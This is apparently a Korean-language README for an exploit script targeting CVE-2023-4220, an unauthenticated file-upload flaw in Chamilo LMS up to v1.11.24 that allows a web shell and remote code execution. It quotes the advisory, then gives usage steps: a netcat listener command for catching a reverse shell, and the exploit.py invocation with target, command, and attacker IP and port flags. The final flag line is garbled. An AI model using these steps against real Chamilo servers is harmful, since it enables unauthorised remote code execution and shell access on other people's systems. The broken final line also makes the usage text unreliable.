CVE-2023-4220-RCE
요약
Starlabs 권고
- 영향받는 제품: Chamilo <= v1.11.24
- 설명: Unrestricted file upload in big file upload functionality in /main/inc/lib/javascript/bigupload/inc/bigUpload.php in Chamilo LMS <= v1.11.24 allows unauthenticated attackers to perform stored cross-site scripting attacks and obtain remote code execution via uploading of web shell.
- CVSS 점수: 8.1 (높음)
사용법
- netcat 리스너 설정 (리버스 셸을 원하는 경우)
sudo nc -lnvp 443
- 익스플로잇 실행
python3 exploit.py -u --url <REMOTE HOST>, -p --port [REMOTE PORT] -c --comand <COMMAND>
- 리버스 셸 플래그
- -lh/--localhost: 공격자 IP
- **-lp/--localtcat 리스너 포트